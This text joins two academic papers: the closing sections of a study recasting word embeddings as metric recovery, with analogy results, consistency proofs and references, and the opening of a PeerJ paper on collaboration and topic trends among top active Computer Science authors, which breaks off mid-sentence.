39.2 37.8 87.6 84.6 58.3 59.0 GloVe 71.1 76.4 68.6 71.9 69.6 73.7 36.9 35.5 74.6 80.1 53.0 58.9 SVD 50.9 58.1 51.4 52.0 51.2 54.3 32.7 24.0 71.6 74.1 49.4 47.6 word2vec 71.4 73.4 70.9 73.3 71.1 73.3 42.0 42.0 76.4 84.6 54.4 56.2 Table 3: Accuracies on Google, SAT analogies and on two new inductive reasoning tasks. Manifold Learning Word Embedding Semantic 83.3 70.7 Syntactic 8.2 76.9 Total 51.4 73.4 Table 4: Semantic similarity alone can solve the Google analogy tasks For fairness we fix all hyperparameters, and de- velop and test the code for metric regression exclu- sively on the first 1GB subset of the wiki dataset. For open-vocabulary tasks, we restrict the set of an- swers to the top 30K words, since this improves per- formance while covering the majority of the ques- tions. In the following, we show performance for the GloVe corpus throughout but include results for all corpora along with our code package. Evaluation tasks: We test the quality of the word embeddings on three types of inductive tasks: analo- gies, sequence completion and classification (Figure 1). For the analogies, we used the standard open- vocabulary analogy task of Mikolov et al. (2013a) (henceforth denoted Google), consisting of 19,544 semantic and syntactic questions. In addition, we use the more difficult SAT analogy dataset (ver- sion 3) (Turney and Littman, 2005), which contains 374 questions from actual exams and guidebooks. Each question consists of 5 exemplar pairs of words word1:word2, where the same relation holds for all pairs. The task is to pick from among another five pairs of words the one that best fits the category im- plicitly defined by the exemplars. Inspired by Sternberg and Gardner (1983), we propose two new difficult inductive reasoning tasks beyond analogies to verify the semantic space hy- pothesis: sequence completion and classification. As described in Section 2, the former involves choosing the next step in a semantically coherent sequence of words (e.g. hour,minute, . . .), and the latter consists of selecting an element within the same category out of five possible choices. Given the lack of publicly available datasets, we generated our own questions using WordNet (Fellbaum, 1998) relations and word-word PMI values. These datasets were constructed before training the embeddings, so as to avoid biasing them towards any one method. For the classification task, we created in-category words by selecting words from WordNet relations associated to root words, from which we pruned to four words based on PMI-similarity to the other words in the class. Additional options for the mul- tiple choice questions were created searching over words related to the root by a different relation type, and selecting those most similar to the root. For the sequence completion task, we obtained WordNet trees of various relation types, and pruned these based on similarity to the root word to obtain the sequence. For the multiple-choice questions, we proceeded as before to select additional (incorrect) options of a different relation type to the root. After pruning, we obtain 215 classification ques- tions and 220 sequence completion questions, of which 51 are open-vocabulary and 169 are multiple choice. These two new datasets are available9. 6.2 Results on inductive reasoning tasks Solving analogies using survey data alone: We demonstrate that, surprisingly, word embeddings trained directly on semantic similarity derived from survey data can solve analogy tasks. Extending a study by Rumelhart and Abrahamson (1973), we use a free-association dataset (Nelson et al., 2004) to construct a similarity graph, where vertices cor- respond to words and the weights wij are given by the number of times word j was considered most similar to word i in the survey. We take the largest connected component of this graph (consisting of 4845 words and 61570 weights) and embed it us- ing Isomap for which squared edge distances are de- fined as − log(wij/ maxkl(wkl)). We use the result- 9http://web.mit.edu/thashim/www/supplement materials.zip 280 Figure 3: Dimensionality reduction using word embedding and manifold learning. Performance is quantified by percentage of 5-nearest neighbors sharing the same digit label. ing vectors as word embeddings to solve the Google analogy task. The results in Table 4 show that em- beddings obtained with Isomap on survey data can outperform the corpus based metric regression vec- tors on semantic, but not syntactic tasks. We hypoth- esize that free-association surveys capture semantic, but not syntactic similarity between words. Analogies: The results on the Google analogies shown in Table 3 demonstrate that our proposed framework of metric regression and L2 distance is competitive with the baseline of word2vec with cosine distance. The performance gap across meth- ods is small and fluctuates across corpora, but met- ric regression consistently outperforms GloVe on most tasks and outperforms all methods on seman- tic analogies, while word2vec does better on syn- tactic categories. For the SAT dataset, the L2 dis- tance performs better than the cosine similarity, and we find word2vec to perform best, followed by metric regression. The results on these two analogy datasets show that directly embedding the log co- occurrence metric and taking L2 distances between vectors is competitive with current approaches to analogical reasoning. Sequence and classification tasks: As predicted by the semantic field hypothesis, word embeddings perform well on the two novel inductive reasoning tasks (Table 3). Again, we observe that the metric recovery with metric regression coupled with L2 dis- tance consistently performs as well as and often bet- ter than the current state-of-the-art word embedding methods on these two additional semantic datasets. 6.3 Word embeddings can embed manifolds In Section 4 we proposed a reduction for solving manifold learning problems with word embeddings which we show achieves comparable performance to manifold learning methods. We now test this rela- tion by performing nonlinear dimensionality reduc- tion on the MNIST digit dataset, reducing from D = 256 to two dimensions. Using a four-thousand im- age subset, we construct a k-nearest neighbor graph (k = 20) and generate 10 simple random walks of length 200 starting from each vertex in the graph, re- sulting in 40,000 sentences of length 200 each. We compare the four word embedding methods against standard dimensionality reduction methods: PCA, Isomap, SNE and, t-SNE. We evaluate the meth- ods by clustering the resulting low-dimensional data and computing cluster purity, measured using the percentage of 5-nearest neighbors having the same digit label. The resulting embeddings, shown in Fig. 3, demonstrate that metric regression is highly effective at this task, outperforming metric SNE and beaten only by t-SNE (91% cluster purity), which is a visualization method specifically designed to pre- serve cluster separation. All word embedding meth- ods including SVD (68%) embed the MNIST digits remarkably well and outperform baselines of PCA (48%) and Isomap (49%). 7 Discussion Our work recasts word embedding as a metric recov- ery problem pertaining to the underlying semantic space. We use co-occurrence counts from random walks as a theoretical tool to demonstrate that exist- ing word embedding algorithms are consistent met- ric recovery methods. Our direct regression method is competitive with the state of the art on various se- mantics tasks, including two new inductive reason- ing problems of series completion and classification. Our framework highlights the strong interplay and common foundation between word embedding methods and manifold learning, suggesting several avenues for recovering vector representations of phrases and sentences via properly defined Markov processes and their generalizations. 281 Appendix A Metric recovery from Markov processes on graphs and manifolds Consider an infinite sequence of points Xn = {x1, . . . ,xn}, where xi are sampled i.i.d. from a density p(x) over a compact Riemannian manifold equipped with a geodesic metric ρ. For our pur- poses, p(x) should have a bounded log-gradient and a strict lower bound p0 over the manifold. The ran- dom walks we consider are over unweighted spatial graphs defined as Definition 2 (Spatial graph). Let σn : Xn → R>0 be a local scale function and h : R≥0 → [0, 1] a piecewise continuous function with sub-Gaussian tails. A spatial graph Gn corresponding to σn and h is a random graph with vertex set Xn and a di- rected edge from xi to xj with probability pij = h(ρ(xi,xj) 2/σn(xi) 2). Simple examples of spatial graphs where the con- nectivity is not random include the ε ball graph (σn(x) = ε) and the k-nearest neighbor graph (σn(x) =distance to k-th neighbor). Log co-occurrences and the geodesic will be con- nected in two steps. (1) we use known results to show that a simple random walk over the spatial graph, properly scaled, behaves similarly to a dif- fusion process; (2) the log-transition probability of a diffusion process will be related to the geodesic metric on a manifold. (1) The limiting random walk on a graph: Just as the simple random walk over the integers con- verges to a Brownian motion, we may expect that under specific constraints the simple random walk Xnt over the graph Gn will converge to some well- defined continuous process. We require that the scale functions converge to a continuous function σ̄ (σn(x)g−1n a.s.−−→ σ̄(x)); the size of a single step van- ish (gn → 0) but contain at least a polynomial num- ber of points within σn(x) (gnn 1 d+2 log(n) − 1 d+2 → ∞). Under this limit, our assumptions about the density p(x), and regularity of the transitions10, the 10For t = Θ(g−2n ), the marginal distribution nP(Xt|X0) must be a.s. uniformly equicontinuous. For undirected spatial graphs, this is always true (Croydon and Hambly, 2008), but for directed graphs it is an open conjecture from (Hashimoto et al., 2015b). following holds: Theorem 3 ((Hashimoto et al., 2015b; Ting et al., 2011)). The simple random walk Xnt on Gn con- verges in Skorokhod space D([0,∞),D) after a time scaling t̂ = tg2n to the Itô process Yt̂ valued in C([0,∞),D) as Xn t̂g−2n → Yt̂. The process Yt̂ is de- fined over the normal coordinates of the manifold (D,g) with reflecting boundary conditions on D as dYt̂ = ∇ log(p(Yt̂))σ(Yt̂) 2dt̂ + σ(Yt̂)dWt̂ (2) The equicontinuity constraint on the marginal densities of the random walk implies that the tran- sition density for the random walk converges to its continuum limit. Lemma 4 (Convergence of marginal densities). (Hashimoto et al., 2015a) Let x0 be some point in our domain Xn and define the marginal densities q̂t(x) = P(Yt = x|Y0 = x0) and qtn (x) = P(Xnt = x|Xn0 = x0). If tng2n = t̂ = Θ(1), then under condition (?) and the results of Theorem 3 such that Xnt → Y nt weakly, we have lim n→∞ nqtn (x) = q̂t̂(x)p(x) −1. (2) Log transition probability as a metric We may now use the stochastic process Yt̂ to connect the log transition probability to the geodesic distance using Varadhan’s large deviation formula. Theorem 5 ((Varadhan, 1967; Molchanov, 1975)). Let Yt be a Itô process defined over a complete Riemann manifold (D,g) with geodesic distance ρ(xi,xj) then lim t→0 −t log(P(Yt = xj|Y0 = xi)) → ρ(xi,xj)2. This estimate holds more generally for any space admitting a diffusive stochastic process (Saloff- Coste, 2010). Taken together, we finally obtain: Corollary 6 (Varadhan’s formula on graphs). For any δ,γ,n0 there exists some t̂, n > n0, and se- quence bnj such that the following holds for the sim- ple random walk Xnt : P ( sup xi,xj∈Xn0 ∣∣∣t̂ log(P(Xn t̂g−2n = xj | Xn0 = xi)) − t̂bnj −ρσ(x)(xi,xj)2 ∣∣∣ > δ ) < γ 282 Where ρσ(x) is the geodesic defined as ρσ(x)(xi,xj) = min f∈C1:f(0)=xi,f(1)=xj ∫ 1 0 σ(f(t))dt Proof. The proof is in two parts. First, by Varad- han’s formula (Theorem 5, (Molchanov, 1975, Eq. 1.7)) for any δ1 > 0 there exists some t̂ such that: sup y,y′∈D |−t̂ log(P(Yt̂ = y ′|Y0 = y))−ρσ(x)(y′,y)2| < δ1 The uniform equicontinuity of the marginals implies their uniform convergence (Lemma S4), so for any δ2 > 0 and γ0, there exists a n such that P( sup xj,xi∈Xn0 |P(Yt̂ = xj|Y0 = xi) −np(xj)P(Xng−2n t̂ = xj|X n 0 = xi)| > δ2) < γ0 By the lower bound on p and compactness of D, P(Yt̂|Y0) is lower bounded by some strictly positive constant c and we can apply uniform continuity of log(x) over (c,∞) to get that for some δ3 and γ, P ( sup xj,xi∈Xn0 | log(P(Yt̂ = xj|Y0 = xi))−log(np(xj)) − log(P(Xn g−2n t̂ = xj|Xn0 = xi))| > δ3 ) < γ. (3) Finally we have the bound, P ( sup xi,xj∈Xn0 |− t̂ log(P(Xn g−2n t̂ = xj|Xn0 = xi)) −t̂ log(np(xj))−ρσ(x)(xi,xj)2| > δ1 +t̂δ3 ) < γ To combine the bounds, given some δ and γ, set bnj = log(np(xj)), pick t̂ such that δ1 < δ/2, then pick n such that the bound in Eq. 3 holds with prob- ability γ and error δ3 < δ/(2t̂). B Consistency proofs for word embedding Lemma 7 (Consistency of SVD). Assume the norm of the latent embedding is proportional to the uni- gram frequency ||xi||/σ2 = Ci/( ∑ j Cj) 1 2 Under these conditions, Let X̂ be the embedding de- rived from the SVD of Mij as 2X̂X̂T = Mij = log(Cij) − log ( Ci ) − log ( Cj ) + log (∑ i Ci ) + τ. Then there exists a τ such that this embedding is close to the true embedding under the same equiva- lence class as Lemma S7 P (∑ i ||Ax̂i/σ2 −xj||22 > δ ) < ε. Proof. By Corollary 6 for any δ1 > 0 and ε1 > 0 there exists a m such that P(sup i,j |− log(Cij) − (||xi −xj||22/σ2) − log(mc)| > δ1) < ε1. Now additionally, if Ci/ √∑ j Cj = ||xi||2/σ2 then we can rewrite the above bound as P(sup i,j | log(Cij)−log(Ci)−log(Cj)+log( ∑ i Ci) − 2〈xi,xj〉/σ2 − log(mc)| > δ1) < ε1. and therefore, P(sup i,j |Mij −2〈xi,xj〉/σ2 − log(mc)| > δ1) < ε1. Given that the dot product matrix has error at most δ1, the resulting embedding it known to have at most√ δ1 error (Sibson, 1979). This completes the proof, since we can pick τ = − log(mc), δ1 = δ2 and ε1 = ε. Theorem 8 (Consistency of softmax/word2vec). Define the softmax objective function with bias as g(x̂, ĉ, b̂) = ∑ ij Cij log exp(−||x̂i − ĉj||22 + b̂j)∑n k=1 exp(−||x̂i − ĉk||22 + b̂k) Define xm,cm,bm as the global minima of the above objective function for a co-occurrence Cij over a corpus of size m. For any ε > 0 and δ > 0 there exists some m such that P(|g( x σ , x σ , 0) −g(xm,cm,bm)| > δ) < ε Proof. By differentiation, any objective of the form min λij Cij log ( exp(−λij)∑ k exp(−λik) ) has the minima λ∗ij = − log(Cij) + ai up to un-identifiable ai with objective function value 283 Cij log(Cij/ ∑ k Cik). This gives a global function lower bound g(xm,cm,bm) ≥ ∑ ij Cij log ( Cij∑ k Cik ) (4) Now consider the function value of the true embed- ding x σ ; g( x σ , x σ , 0) = ∑ ij Cij log exp(− 1 σ2 ||xi −xj||22)∑ k exp(− 1σ2 ||xi −xk|| 2 2) = ∑ ij Cij log ( exp(log(Cij) + δij + ai)∑ k exp(log(Cik) + δik + ai) ) . We can bound the error variables δij using Corol- lary 6 as supij |δij| < δ0 with probability ε0 for sufficiently large m with ai = log(mi) − log( ∑n k=1 exp(−||xi −xk||22/σ2)). Taking the Taylor expansion at δij = 0, we have g( x σ , x σ , 0) = ∑ ij Cij log Cij∑ k Cik + n∑ l=1 Cil∑ k Cikδil + o(||δ||22) By the law of large numbers of Cij, P (∣∣∣g( xσ, x σ , 0)− ∑ ij Cij log ( Cij∑ k Cik )∣∣∣ > nδ0 ) < ε0 which combined with (4) yields P(|g( x σ , x σ , 0) −g(x,c,b)| > nδ0) < ε0. To obtain the original theorem statement, take m to fulfil δ0 = δ/n and ε0 = ε. Note that for word2vec with negative-sampling, applying the stationary point analysis of Levy and Goldberg (2014b) combined with the analysis in Lemma S7 shows that the true embedding is a global minimum. C Empirical evaluation details C.1 Implementation details We used off-the-shelf implementations of word2vec11 and GloVe12. The two other methods (randomized) SVD and regression embed- ding are both implemented on top of the GloVe codebase. We used 300-dimensional vectors and window size 5 in all models. Further details are provided below. 11http://code.google.com/p/word2vec 12http://nlp.stanford.edu/projects/glove word2vec. We used the skip-gram version with 5 negative samples, 10 iterations, α = 0.025 and fre- quent word sub-sampling with a parameter of 10−3. GloVe. We disabled GloVe’s corpus weighting, since this generally produced superior results. The default step-sizes results in NaN-valued embed- dings, so we reduced them. We used XMAX = 100, η = 0.01 and 10 iterations. SVD. For the SVD algorithm of Levy and Gold- berg (2014b), we use the GloVe co-occurrence counter combined with a parallel randomized pro- jection SVD factorizer, based upon the redsvd li- brary due to memory and runtime constraints.13 Fol- lowing Levy et al. (2015), we used the square root factorization, no negative shifts (τ = 0 in our nota- tion), and 50,000 random projections. Regression Embedding. We use standard SGD with two differences. First, we drop co-occurrence values with probability proportional to 1 − Cij/10 when Cij < 10, and scale the gradient, which re- sulted in training time speedups with no loss in ac- curacy. Second, we use an initial line search step combined with a linear step size decay by epoch. We use θ = 50 and η is line-searched starting at η = 10. C.2 Solving inductive reasoning tasks The ideal point for a task is defined below: • Analogies: Given A:B::C, the ideal point is given by B −A + C (parallelogram rule). • Analogies (SAT): Given prototype A:B and candidates C1 : D1 . . .Cn : Dn, we compare Di −Ci to the ideal point B −A. • Categories: Given a category implied by w1, . . . ,wn, the ideal point is I = 1 n ∑n i=1 wi. • Sequence: Given sequence w1 : · · · : wn we compute the ideal as I = wn + 1 n (wn −w1). Once we have the ideal point I, we pick the answer as the word closest to I among the options, using L2 or cosine distance. For the latter, we normalize I to unit norm before taking the cosine distance. For L2 we do not apply any normalization. 13https://github.com/ntessore/redsvd-h 284 References Sanjeev Arora, Yuanzhi Li, Yingyu Liang, Tengyu Ma, and Andrej Risteski. 2015. Random walks on con- text spaces: Towards an explanation of the myster- ies of semantic word embeddings. arXiv preprint arXiv:1502.03520. Kenneth Ward Church and Patrick Hanks. 1990. Word association norms, mutual information, and lexicogra- phy. Computational Linguistics, 16(1):22–29. David A Croydon and Ben M Hambly. 2008. Local limit theorems for sequences of simple random walks on graphs. Potential Analysis, 29(4):351–389. Christiane Fellbaum, editor. 1998. WordNet: an elec- tronic lexical database. Thomas L Griffiths, Mark Steyvers, and Joshua B Tenen- baum. 2007. Topics in semantic representation. Psy- chological review, 114(2):211. Zellig S Harris. 1954. Distributional structure. Word, 10(23):146–162. Tatsunori Hashimoto, Yi Sun, and Tommi Jaakkola. 2015a. From random walks to distances on un- weighted graphs. In Advances in Neural Information Processing Systems. Tatsunori Hashimoto, Yi Sun, and Tommi Jaakkola. 2015b. Metric recovery from directed unweighted graphs. In Artificial Intelligence and Statistics, pages 342–350. Geoffrey E Hinton and Sam T Roweis. 2002. Stochastic neighbor embedding. In Advances in Neural Informa- tion Processing Systems, pages 833–840. Matthäus Kleindessner and Ulrike von Luxburg. 2015. Dimensionality estimation without distances. In Pro- ceedings of the Artificial Intelligence and Statistics conference (AISTATS). Omer Levy and Yoav Goldberg. 2014a. Linguistic Regularities in Sparse and Explicit Word Representa- tions. In Proceedings 18th Conference on Computa- tional Natural Language Learning, pages 171–180. Omer Levy and Yoav Goldberg. 2014b. Neural word embedding as implicit matrix factorization. In Ad- vances in Neural Information Processing Systems, pages 2177–2185. Omer Levy, Yoav Goldberg, and Ido Dagan. 2015. Im- proving distributional similarity with lessons learned from word embeddings. Transactions of the Associa- tion for Computational Linguistics, 3:211–225. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013a. Efficient estimation of word representa- tions in vector space. In ICLR Workshop. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S Cor- rado, and Jeff Dean. 2013b. Distributed represen- tations of words and phrases and their composition- ality. In Advances in Neural Information Processing Systems, pages 3111–3119. SA Molchanov. 1975. Diffusion processes and rie- mannian geometry. Russian Mathematical Surveys, 30(1):1. Douglas L Nelson, Cathy L McEvoy, and Thomas A Schreiber. 2004. The university of south florida free association, rhyme, and word fragment norms. Be- havior Research Methods, Instruments, & Computers, 36(3):402–407. Jeffrey Pennington, Richard Socher, and Christopher D Manning. 2014. Glove: Global vectors for word rep- resentation. In Proceedings of the Empiricial Methods in Natural Language Processing, pages 1532–43. Bryan Perozzi, Rami Al-Rfou, and Steven Skiena. 2014. Deepwalk: Online learning of social representations. In Proceedings of the 20th ACM SIGKDD Interna- tional Conference on Knowledge Discovery and Data Mining, pages 701–710. ACM. David E Rumelhart and Adele A Abrahamson. 1973. A model for analogical reasoning. Cognitive Psychol- ogy, 5(1):1–28. Laurent Saloff-Coste. 2010. The heat kernel and its es- timates. Probabilistic approach to geometry, 57:405– 436. Gideon Schwarz and Amos Tversky. 1980. On the reci- procity of proximity relations. Journal of Mathemati- cal Psychology, 22(3):157–175. Robin Sibson. 1979. Studies in the robustness of multidi- mensional scaling: Perturbational analysis of classical scaling. Journal of the Royal Statistical Society. Series B (Methodological), pages 217–229. Richard Socher, John Bauer, Christopher D Manning, and Andrew Y Ng. 2013. Parsing with compositional vec- tor grammars. In Proceedings of the ACL conference. Robert J Sternberg and Michael K Gardner. 1983. Uni- ties in inductive reasoning. Journal of Experimental Psychology: General, 112(1):80. Joshua B Tenenbaum, Vin De Silva, and John C Langford. 2000. A global geometric framework for nonlinear dimensionality reduction. Science, 290(5500):2319–2323. Joshua B Tenenbaum. 1998. Mapping a manifold of per- ceptual observations. In Advances in Neural Informa- tion Processing Systems, pages 682–688. Daniel Ting, Ling Huang, and Michael Jordan. 2011. An analysis of the convergence of graph laplacians. arXiv preprint arXiv:1101.5435. Joseph Turian, Lev Ratinov, and Yoshua Bengio. 2010. Word representations: a simple and general method for semi-supervised learning. In Proceedings of the 48th annual meeting of the Association for Computational Linguistics, pages 384–394. ACL. Peter D Turney and Michael L Littman. 2005. Corpus- based learning of analogies and semantic relations. Machine Learning, 60(1-3):251–278. 285 Amos Tversky and J Hutchinson. 1986. Nearest neigh- bor analysis of psychological spaces. Psychological Review, 93(1):3. Srinivasa RS Varadhan. 1967. Diffusion processes in a small time interval. Communications on Pure and Applied Mathematics, 20(4):659–685. 286 work_msh6qeabq5gh7dweztzxd5tdvi ---- Research collaboration and topic trends in Computer Science based on top active authors Submitted 12 August 2015 Accepted 14 December 2015 Published 13 January 2016 Corresponding author Dah Ming Chiu, dmchiu@ie.cuhk.edu.hk Academic editor Luciano Sánchez Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.41 Copyright 2016 Wu et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Research collaboration and topic trends in Computer Science based on top active authors Yan Wu1, Srinivasan Venkatramanan2 and Dah Ming Chiu1 1 Department of Information Engineering, The Chinese University of Hong Kong, Hong Kong 2 Virginia Bioinformatics Institute, Virginia Polytechnic Institute and State University (Virginia Tech), United States ABSTRACT Academic publication metadata can be used to analyze the collaboration, productivity and hot topic trends of a research community. In this paper, we study a specific group of authors, namely the top active authors. They are defined as the top 1% authors with uninterrupted and continuous presence in scientific publications over a time window. We take the top active authors in the Computer Science (CS) community over different time windows in the past 50 years, and use them to analyze collaboration, productivity and topic trends. We show that (a) the top active authors are representative of the overall population; (b) the community is increasingly moving in the direction of Team Research, with increased level and degree of collaboration; and (c) the research topics are increasingly inter-related. By focusing on the top active authors, it helps visualize these trends better. Besides, the observations from top active authors also shed light on design of better evaluation framework and resource management for policy makers in academia. Subjects Data Mining and Machine Learning, Data Science, Digital Libraries, Network Science and Online Social Networks, Social Computing Keywords Top active author, Research collaboration, Topic trends INTRODUCTION As a research field established in the 1960s (Brookshear, 2011), Computer Science has gone through rapid development and become a mature field. Much can be learned about the de- velopments and trends in Computer Science by analyzing the publication metadata. In this study, we take a particular approach, by focusing on analyzing the Top Active Authors in the field. We define top active authors to be the 1% authors with uninterrupted and contin- uous presence in scientific publications over a time window. The definition of Top Active Authors is based on the term “UCP author”, which was defined by Ioannidis, Boyack & Kla- vans (2014) in their study of publication metadata obtained from Scopus in a specific time window of 16 years. During the period from 1996 to 2011, they noted that the number of authors who published papers every year without gap amounts to about 1% of all authors; and these UCP authors coauthored a much larger percentage of papers and amassed a high percentage of the total citations, compared to the average researcher. Therefore, we might treat top active authors as the core of the community for the given time window. By analyz- ing their activities, we may get insights into the major trends of the whole community. How to cite this article Wu et al. (2016), Research collaboration and topic trends in Computer Science based on top active authors. PeerJ Comput. Sci. 2:e41; DOI 10.7717/peerj-cs.41 mailto:dmchiu@ie.cuhk.edu.hk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.41 http://dx.doi.org/10.7717/peerj-cs.41 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 In our study, we further explore the nature and extent of collaborative efforts by the top active authors in comparison with average authors. Recently, it was pointed out by Wuchty, Jones & Uzzi (2007) that “Team Science” is an important trend in how research is carried out. The phenomenon is manifested in the steady increase in the number of coauthors per paper. Since this trend exists not only in science but also in other research fields, we can refer to it as “Team Research”. The “team” in Team Research may correspond to an organized group within an organization (a research lab), or collaborative partnership between researchers in different organizations and countries. From the collaboration patterns of top active authors, we can get more insights about Team Research, in particular its relation to research productivity. Besides, by observing the research topics that top active authors are working on, we can also get a sense of the general research topic trends in the whole community. Our goal goes beyond simple data analysis in this work. We hope the observations from top active authors can not only show the general trends in doing research in the academic community, but also provide insights for policy researchers and policy makers in academia. For example, the comparison between top active authors and average authors might shed light on the shortcomings of current author evaluation framework, and help develop different evaluation metrics for different author types. And the general trends in research collaboration and topic may also help policy makers adjust resource allocations at different periods and do better resource management. RELATED WORK Research collaboration has been long studied in the scientometrics field. For example, Katz (1994) examined the geographical effects on intra-national scientific collaboration and demonstrated that research collaboration decreases exponentially with the distance sepa- rating the collaborative partners. Wagner & Leydesdorff (2005) showed that international collaboration is a self-organizing network, and its growth can be explained based on the organizing principle of preferential attachment. There are also a lot of works focusing on the statistically significant increase in the amount of research collaboration in this field. For example, O’Brien (2012) showed the overall increase in the number of coauthored articles in the literature; Wuchty, Jones & Uzzi (2007) coined the term “team science” and showed the increasing dominance of team science in the production of knowledge; and Uddin, Hossain & Rasmussen (2013) studied the network effects on authors’ collaboration behaviors. The authors’ research collaboration behavior also attracted attentions from researchers studying networks, and most of the studies were based on the classic work from Newman (2001). He treated the coauthor network as a special example of a social network and studied the structural properties of such a network. Researchers have also studied the structural evolution of a collaboration network. For instance, Kunegis, Fay & Bauckhage (2010) analyzed the eigenvector evolution of the coauthor network and proposed a spectral evolution model to show the change of coauthor structures; Huang et al. (2008) proposed a stochastic Poisson model with optimization tree, which can efficiently predict Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 2/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 the increment of collaboration based on local neighborhood structure; Pan & Saramäki (2012) and Ke & Ahn (2014) studied the relationship between tie strength and network topology in coauthor network and found its difference with social networks in general. Besides, research collaboration has always been an important component when considering policies towards research. Many works focusing on research policy studies have tried to evaluate the efficiency of resource management in system based on researchers’ collaboration behavior. Classic works in this field include Katz & Martin (1997), where the authors studied research collaboration at different levels and argued for a more symmetrical approach in comparing the costs of collaboration with the benefits; and Lee & Bozeman (2005), where the authors investigated the impact of research collaboration on scientific productivity and showed the different impacts at individual level and community level. They also proposed considering collaborations in terms of the extent to which resources fit research needs. There are also works based on surveys of individual researchers’ opinions on research collaboration such as Melin (2000), where the author suggested that research policy should provide financial and organizational possibilities for the researchers to establish joint ventures and also fund projects on a team or network basis. Another group of papers related to our work studied the factors that may influence productivity or authors’ research behavior. For example, Gingras et al. (2008) showed the effects of aging on researchers’ publication patterns and described researchers’ publication style during different stages of career. Petersen et al. (2012) found the existence of the Matthew effect in academic publishing, which may favor senior and experienced researchers. Finally, Ioannidis, Boyack & Klavans (2014) was the first to introduce the notion of uninterrupted and continuous presence as a way to identify a set of core authors in a research community, and showed the dominance of these authors in the production of academic outputs. Most of the previous works (except Ioannidis, Boyack & Klavans (2014)) analyze the entire population of a community. By focusing on top active authors, which is a much smaller, but important and representative subset of the overall population, we are able to find more results about trends in research collaboration (team research), its relationship to research productivity, and the evolution of research topics and focus as well. MATERIALS & METHODS Our data is collected from Microsoft Academic Search (MAS) (http://academic.research. microsoft.com/). MAS gathers bibliographic information from the principal scientific publishing services covering papers from 1700 to present, and uses its own classification scheme based on 15 research fields and more than 200 subdomains to classify different papers (Orduña-Malea et al., 2014). For example, the 15 fields include Computer Science, Physics, and Mathematics, and papers in the Computer Science field can be further categorized into 24 subdomains such as “Databases”, “Machine learning and Pattern Recognition”, “Networks and Communications” and so on.1 Each paper is labelled with 1 Some papers are only classified as Computer Science papers, but not categorized into any subdomain. a unique numerical ID; its metadata includes paper title, author list, publication year, Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 3/21 https://peerj.com/computer-science/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://dx.doi.org/10.7717/peerj-cs.41 Table 1 Dataset description. Field coverage Computer Science Time coverage (year) 1960–2009 #papers 2,698,044 #authors 1,393,143 #paper-author mapping links 6,643,575 publication venue and a reference list. Likewise, authors are maintained as another type of object. Each author is labelled with a unique numerical ID as well; its metadata includes current affiliation and publication history. An author’s research field and research subdomains in that field can be obtained from his publication history. We choose the Computer Science field, which seems most complete (and we are most familiar with) for a case study in this paper. The same methodology can be applied to data from other sources, pertaining to other scientific disciplines. Based on the mapping information of papers and authors, we can obtain the detailed evolution trend of author collaboration and author productivity for both top active authors and average authors. This can show us the general trend in the community as a whole, and also the difference between top active authors and average authors. Besides, since our metadata comes with classification of each paper into a research subdomain in Computer Science, it is possible to tell the subdomains each top active author works in. Given the moderate size for the set of all top active authors, it is possible to apply graph clustering algorithms to find the collaboration clusters for top active authors in Computer Science over time, and characterize these clusters in terms of the major subdomains they are working on. Such analysis will show us the research topic trend in Computer Science. Considering the fact that the data for the earlier and the most recent years are less complete, we take the data in the 50-year window [1960,2009] for our analysis in this paper.2 Note that although Orduña-Malea et al. (2014) pointed out the limitation of the 2 The data from MAS was lastly collected on July 31, 2012. data from MAS, which includes the decreasing update rate and incomplete indexation of all papers recently, the limitation and misleading information lies mostly in the data starting from 2010, as the authors indicated. Therefore, we believe the data in the time window we focus on is relatively reliable, and will not affect the validity of our results. We also filter out paper records without publication year or author information for this study. Table 1 presents a general description of our dataset. The more detailed evolution of the dataset is shown in Fig. 1, where we plot the annual number of active authors and papers each year in the time window [1960,2009]. The rapid expansion of the Computer Science field can be observed clearly. RESULTS Comparing top active authors and average authors In this section, we analyze and compare the collaboration levels and patterns of top active authors versus average authors, as well as their productivity. We take one active window as Wu et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.41 4/21 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.41 Figure 1 Number of active authors and papers each year in the time window [1960,2009]. an example, and show the detailed comparison across different years in that window. Since results in other active windows are similar, we then show brief results across different active windows, instead of the detailed comparison in each active window. Top active authors Ioannidis, Boyack & Klavans (2014) defined “UCP authors” by considering a specific window of years, from 1996 to 2011, and observed that there are about 1% such authors. For our purposes, we define the top active authors based on the UCP metric. For each year to be used as the start of a window, we find the top 1% authors in terms of the length of uninterrupted and continuous presence from that starting year. This gives rise to an active window size for top active authors for each year. For example, starting from year 1988, the active window size needs to be set as 8 (which means the ending year of that active window is 1995), in order to make the percentage of top active authors 